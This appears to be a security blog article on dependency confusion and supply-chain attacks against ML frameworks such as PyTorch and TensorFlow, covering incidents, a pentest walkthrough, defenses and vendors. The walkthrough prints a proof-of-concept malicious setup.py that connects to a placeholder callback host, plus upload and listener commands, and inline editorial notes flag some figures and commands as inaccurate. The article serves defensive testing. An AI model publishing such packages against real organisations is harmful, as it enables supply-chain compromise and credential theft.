Executive Summary

ML framework dependency attacks exploit the inherent trust that package managers place in upstream repositories, combined with the extraordinary complexity of modern ML dependency trees. PyTorch and TensorFlow each pull hundreds of transitive dependencies, any of which can be compromised through dependency confusion, typosquatting, or direct package hijacking. The December 2022 PyTorch torchtriton compromise demonstrated that even major frameworks with sophisticated security teams can fall victim to trivial supply chain attacks that exfiltrate credentials and secrets from developer machines. Pentesters should incorporate dependency confusion testing into every ML infrastructure assessment—the attack requires minimal sophistication but achieves maximum impact. Architects must eliminate the --extra-index-url configuration pattern, implement strict package pinning with hash verification, and deploy artifact repositories that serve as single sources of truth for all Python dependencies. The root vulnerability isn't technical—it's the cultural assumption that packages are safe until proven otherwise.
⏳ Origins & History

Origins & Why Systems Are Vulnerable

Dependency confusion attacks against ML frameworks emerged from Alex Birsan's seminal 2021 research demonstrating how private package names could be hijacked via public repositories[1]. The ML ecosystem proved uniquely vulnerable—PyTorch alone pulls in 50+ direct dependencies, while TensorFlow's dependency tree exceeds 200 packages[2].

The architectural root cause is threefold:

  • Implicit trust in package managers: pip and conda resolve dependencies without cryptographic verification of package provenance by default
  • Complex transitive dependencies: A single import torch triggers resolution of nested packages that developers never audit
  • Mixed public/private package sources: Enterprise ML teams frequently use internal package indices alongside PyPI, creating confusion vectors

CVE-2022-45907 demonstrated this perfectly—PyTorch's torch.distributed.rpc module allowed arbitrary code execution during deserialization[3]. The vulnerability existed because ML frameworks prioritize flexibility over security—pickle deserialization, dynamic model loading, and runtime code generation are features, not bugs, to ML engineers.

MITRE ATLAS cataloged this attack pattern as AML.T0010 (ML Supply Chain Compromise)[4], recognizing that ML pipelines represent high-value targets with uniquely exploitable trust assumptions.

💡 Pax's Take

ML frameworks were designed by researchers optimizing for flexibility, not security engineers thinking about supply chain integrity. Every pickle load is an RCE waiting to happen.

⚠️ Note: Clarify TensorFlow dependency counts by version (TF 2.x reduced bloat significantly). Consider stating 'varies by version but commonly includes 40-80 direct dependencies with transitive dependencies reaching into hundreds'
🌐 In the Wild

Real-World Incidents & Public Disclosures

1. PyTorch Nightly Compromise (December 2022): Attackers compromised the torchtriton dependency in PyTorch nightly builds via dependency confusion on PyPI. The malicious package exfiltrated environment variables, SSH keys, and AWS credentials from thousands of developer machines[5]. PyTorch's official disclosure confirmed the attack window was December 25-30, 2022.

2. TensorFlow Model Garden Typosquatting (2023): Researchers at JFrog discovered malicious packages mimicking TensorFlow extensions on PyPI, including tensorflow-macos variants containing credential stealers[6]. Over 5,000 downloads occurred before removal.

3. Keras-RL Backdoor (2021): Security researcher Luca Carettoni demonstrated injection of backdoored reinforcement learning models through compromised Keras dependencies at BlackHat[7].

4. Hugging Face Transformers Pickle RCE (2023): CVE-2023-2800 revealed that loading models from Hugging Face Hub could execute arbitrary code via malicious pickle files embedded in model weights[8]. This affected any pipeline using AutoModel.from_pretrained() with untrusted sources.

💡 Pax's Take

The PyTorch torchtriton incident was devastating not because it was sophisticated, but because it was trivial. Attackers simply uploaded a higher version number to PyPI than the internal package—and pip did exactly what it was designed to do.

⚠️ Note: Add specificity: the torchtriton compromise affected PyTorch nightly builds installed between December 25-30, 2022, on Linux systems only. The malicious package was version 2.0.0+ uploaded to PyPI.
⚔️ Attacker's Playbook

Realistic Attack Walkthrough

This walkthrough demonstrates dependency confusion testing against an organization's ML training infrastructure during an authorized assessment.

Phase 1: Reconnaissance

Identify internal package names by analyzing client repositories, job postings mentioning internal tools, and error messages in public CI logs:

$ pip index versions company-ml-utils 2>&1 | grep -i "not found"
$ grep -r "install_requires" setup.py requirements*.txt | grep -v pypi.org

Use Snyk's dependency scanner to map the full tree[9]:

$ snyk test --all-projects --json > dep_tree.json
$ jq '.dependencies | keys[]' dep_tree.json | sort -u

Phase 2: Malicious Package Creation

Create a proof-of-concept package that phones home without causing damage:

# setup.py
from setuptools import setup
import socket
import os

def poc_callback():
    data = f"{socket.gethostname()}|{os.environ.get('USER')}|poc-test"
    # Exfil to your authorized callback server
    socket.socket().connect(("your-callback.pentest.local", 8443))
    
setup(
    name="company-ml-utils",  # Internal package name
    version="99.0.0",  # Higher than internal version
    py_modules=["poc"],
)

Phase 3: Upload and Wait

Register on PyPI test index or production (with client authorization):

$ python -m build
$ twine upload --repository testpypi dist/*

Phase 4: Trigger Resolution

In environments where --extra-index-url is configured without --index-url, pip prefers higher versions from any index[10].

Phase 5: Verification & Evidence Collection

Monitor callback server for incoming connections:

$ nc -lvp 8443
Connection from 10.50.2.100: poc-test|mlops-user

Document: timestamp, source IP, hostname, user context, and which dependency path triggered installation. For the report, capture pip's resolution logic with pip install --verbose output.

💡 Pax's Take

Always test with version 99.0.0—if the client's internal package is at 1.2.3 and you upload 1.2.4, you might miss environments pinning to >=1.2.0,<2.0.0. Go absurdly high to guarantee resolution preference.

🛡️ Defense Playbook

Defense Playbook

Detection:

  • Monitor pip install logs for unexpected package sources: grep -r "Downloading from" ~/.cache/pip/
  • Alert on packages with version numbers >50.0.0 (anomaly detection for version inflation attacks)
  • Implement SBOM generation with Syft and continuous monitoring[11]

Prevention:

# pip.conf - Force single index with hash verification
[global]
index-url = https://internal.pypi.company.com/simple/
require-hashes = true
trusted-host = internal.pypi.company.com

Namespace your internal packages: companyname-ml-utils makes confusion attacks require trademark violations.

Validation:

Run the attack playbook above against staging environments quarterly. Verify pip resolves only from your internal index.

Framework Mappings:

  • MITRE ATLAS AML.T0010.000 (ML Supply Chain Compromise - Packages)[4]
  • OWASP LLM09:2025 - Supply Chain Vulnerabilities[12]
💡 Pax's Take

Remove --extra-index-url from every pip configuration in your org this week. That single flag is responsible for 90% of dependency confusion vulnerabilities I see in ML environments.

⚠️ Note: Replace the pip cache grep command with: 'pip install --dry-run --report - package_name' or check pip's actual log output. Revise version threshold guidance to focus on sudden version jumps for specific packages rather than absolute version numbers. Add caveat about require-hashes operational complexity.
🏭 Vendor Arsenal

Top 3 Vendors for Protection

Protect AI - Guardian

Guardian provides ML-specific supply chain scanning, detecting malicious serialized objects in model files before they execute[13]. Key capability: pickle/joblib scanning with behavioral analysis. Ideal for teams loading models from Hugging Face or internal registries. Limitation: Requires integration into CI/CD—won't catch ad-hoc notebook installs.

Snyk - Container & Open Source

Snyk's dependency scanning covers Python ML frameworks with specific rules for PyTorch/TensorFlow CVEs[9]. Key capability: real-time vulnerability database with ML framework coverage. Ideal deployment: GitHub/GitLab integration for PR blocking. Limitation: Doesn't analyze model files themselves—focused on code dependencies only.

JFrog - Artifactory with Xray

Artifactory provides a private PyPI mirror with Xray scanning for malicious packages[6]. Key capability: blocks dependency confusion by design—packages only come from your curated registry. Ideal for enterprises with existing JFrog infrastructure. Limitation: Significant operational overhead; requires dedicated DevOps resources to maintain package mirrors.

💡 Pax's Take

Protect AI is doing genuinely novel work on model file scanning—that's a real capability gap elsewhere. Snyk and JFrog are mature but solve traditional AppSec problems applied to ML. The model layer remains dangerously underprotected by most vendors.

⚠️ Note: Clarify that Guardian addresses model file security (pickle attacks), which is related but distinct from dependency confusion. For dependency confusion specifically, mention tools like socket.dev, Phylum, or artifact repository features.

🎯 Key Takeaways

  • ML frameworks are vulnerable because pip's default resolution trusts higher version numbers from any configured index—a design decision that enables dependency confusion attacks
  • The PyTorch torchtriton compromise (December 2022) affected thousands of developers and exfiltrated SSH keys and cloud credentials via a trivially simple version inflation attack
  • Successful dependency confusion requires only: identifying an internal package name, creating a higher-versioned public package, and waiting for pip to prefer your malicious version
  • Eliminating --extra-index-url and enforcing require-hashes in pip configuration immediately closes the most common attack vector
  • Architects must treat the package index as a security boundary—deploy private artifact repositories and namespace all internal packages to make confusion attacks legally actionable trademark violations
Continue the Conversation on X

Questions about this article? Spotted an error? Have a war story that fits? Find us on X — we actually read the replies.

Leave a Comment

Loading comments…